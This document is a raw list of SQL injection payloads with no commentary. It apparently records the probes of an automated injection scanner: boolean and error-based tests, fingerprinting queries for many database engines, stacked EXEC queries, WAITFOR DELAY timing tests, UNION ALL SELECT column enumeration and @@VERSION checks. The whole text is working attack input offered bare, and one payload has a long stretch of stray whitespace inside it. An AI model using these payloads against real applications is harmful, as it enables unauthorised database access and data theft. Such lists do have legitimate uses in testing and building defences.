0
0
0)..)).'.")
0'RuhxSg<'">ZQJUVC
0) AND 4988=6119-- rIpW
0) AND 9942=9942-- XUwL
0) AND 4483=3712 AND (2037=2037
0) AND 9942=9942 AND (4724=4724
0)) AND 8460=2030 AND ((8572=8572
0)) AND 9942=9942 AND ((6173=6173
0))) AND 4981=9264 AND (((9502=9502
0))) AND 9942=9942 AND (((2215=2215
0 AND 1586=5605
0 AND 9942=9942
0 AND 9751=7045
0 AND (SELECT CVAR(NULL) FROM MSysAccessObjects) IS NULL
0 AND (SELECT TDESENCRYPT(NULL,NULL)) IS NULL
0 AND (SELECT %SQLUPPER NULL) IS NULL
0 AND (SELECT halfMD5(NULL) IS NULL) IS NULL
0 AND (SELECT MD5(NULL~NULL)) IS NULL
0 AND (SELECT (NULL SETEQ NULL)) IS NULL
0 AND (SELECT CHR(102)||CHR(101)||CHR(90)||CHR(97) FROM SYSIBM.SYSDUMMY1)='feZa'
0 AND (SELECT NULLIF(USER,SESSION_USER) FROM SYSIBM.SYSDUMMY1) IS NULL
0 AND (SELECT NULLIFZERO(hashcode(NULL))) IS NULL
0 AND (SELECT 'ffnX' FROM RDB$DATABASE)='ffnX'
0 AND (SELECT 'Gvoc' FROM INFORMATION_SCHEMA.IO_STATISTICS)='Gvoc'
0 AND (SELECT STRINGTOUTF8(NULL)) IS NULL
0 AND (SELECT CHAR(103)||CHAR(101)||CHAR(118)||CHAR(99) FROM INFORMATION_SCHEMA.SYSTEM_USERS)='gevc'
0 AND (SELECT 'YzND' FROM SYSMASTER:SYSDUAL)='YzND'
0 AND (SELECT ALPHA(NULL) FROM VERSIONS) IS NULL
0 AND (SELECT TONUMBER(NULL)) IS NULL
0 AND (SELECT ASCII_CHAR(256) FROM SYSTEM.ONEROW) IS NULL
0 AND (SELECT CODE(NULL)) IS NULL
0 AND (SELECT DIFFERENCE(NULL,NULL)) IS NULL
0 AND (SELECT CHAR(74)+CHAR(108)+CHAR(98)+CHAR(101))='ocmJ'
0 AND 7387 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7387=7387) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)))
-7871
-4105 OR 7443 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7443=7443) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)))
0 AND 5829=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5829=5829) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)))
-9005 OR 8965=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8965=8965) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)))
0 AND 6146=CONCAT(CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113),(SELECT (CASE WHEN (6146=6146) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))
-5166 OR 7493=CONCAT(CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113),(SELECT (CASE WHEN (7493=7493) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))
(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2491=2491) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))))
(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8452=8452) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))
0;DECLARE @GmpE NVARCHAR(4000);SET @GmpE=(SELECT 'qxpkq'+(SELECT (CASE WHEN (5058=5058) THEN '1' ELSE '0' END))+'qjvkq');EXEC @GmpE--
(SELECT CONCAT(CONCAT('qxpkq',(CASE WHEN (6113=6113) THEN '1' ELSE '0' END)),'qjvkq'))
(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(CASE WHEN (8683=8683) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113))
0;WAITFOR DELAY '0:0:5'--
0;WAITFOR DELAY '0:0:0'--
0;WAITFOR DELAY '0:0:5'--
0 WAITFOR DELAY '0:0:5'
0 WAITFOR DELAY '0:0:0'
0 WAITFOR DELAY '0:0:5'
0 ORDER BY 1-- IACa
0 UNION ALL SELECT NULL-- MqUo
0 UNION ALL SELECT NULL,NULL-- HWkP
0 UNION ALL SELECT NULL,NULL,NULL-- BvRn
0 UNION ALL SELECT NULL,NULL,NULL,NULL-- fLll
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- JxdQ
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- VDLR
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uNfM
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YnPH
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PDXZ
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- AHDg
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hjfA
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gObt
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YgPW
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DOwK
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Zugm
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lhUT
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YYIu
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MWJd
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- mfJO
0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SduA
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(68)+CHAR(122)+CHAR(76)+CHAR(105)+CHAR(121)+CHAR(107)+CHAR(117)+CHAR(106)+CHAR(107)+CHAR(69)+CHAR(119)+CHAR(70)+CHAR(117)+CHAR(66)+CHAR(122)+CHAR(97)+CHAR(78)+CHAR(86)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(109)+CHAR(76)+CHAR(75)+CHAR(110)+CHAR(72)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(116)+CHAR(118)+CHAR(85)+CHAR(83)+CHAR(99)+CHAR(110)+CHAR(83)+CHAR(104)+CHAR(98)+CHAR(69)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- EviM
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(68)+CHAR(122)+CHAR(76)+CHAR(105)+CHAR(121)+CHAR(107)+CHAR(117)+CHAR(106)+CHAR(107)+CHAR(69)+CHAR(119)+CHAR(70)+CHAR(117)+CHAR(66)+CHAR(122)+CHAR(97)+CHAR(78)+CHAR(86)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(109)+CHAR(76)+CHAR(75)+CHAR(110)+CHAR(72)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(116)+CHAR(118)+CHAR(85)+CHAR(83)+CHAR(99)+CHAR(110)+CHAR(83)+CHAR(104)+CHAR(98)+CHAR(69)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113) UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(101)+CHAR(78)+CHAR(76)+CHAR(80)+CHAR(106)+CHAR(84)+CHAR(87)+CHAR(109)+CHAR(114)+CHAR(90)+CHAR(88)+CHAR(105)+CHAR(122)+CHAR(83)+CHAR(82)+CHAR(84)+CHAR(107)+CHAR(78)+CHAR(78)+CHAR(114)+CHAR(107)+CHAR(90)+CHAR(81)+CHAR(75)+CHAR(114)+CHAR(78)+CHAR(111)+CHAR(65)+CHAR(81)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(109)+CHAR(109)+CHAR(66)+CHAR(100)+CHAR(105)+CHAR(74)+CHAR(115)+CHAR(97)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- Yvwt
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(68)+CHAR(122)+CHAR(76)+CHAR(105)+CHAR(121)+CHAR(107)+CHAR(117)+CHAR(106)+CHAR(107)+CHAR(69)+CHAR(119)+CHAR(70)+CHAR(117)+CHAR(66)+CHAR(122)+CHAR(97)+CHAR(78)+CHAR(86)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(109)+CHAR(76)+CHAR(75)+CHAR(110)+CHAR(72)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(116)+CHAR(118)+CHAR(85)+CHAR(83)+CHAR(99)+CHAR(110)+CHAR(83)+CHAR(104)+CHAR(98)+CHAR(69)+CHAR(118)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113) FROM (SELECT 0 AS IYeE UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS vjiP-- Rnaf
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(CASE WHEN (6110=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6110) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- aYKI
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(CASE WHEN (UNICODE(SQUARE(NULL)) IS NULL) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- bEDz
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(CASE WHEN (CHARINDEX(CHAR(49)+CHAR(54)+CHAR(46)+CHAR(48)+CHAR(46),@@VERSION)>0) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- HQLb
0 UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+(CASE WHEN (CHARINDEX(CHAR(49)+CHAR(53)+CHAR(46)+CHAR(48)+CHAR(46),@@VERSION)>0) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113)-- aytH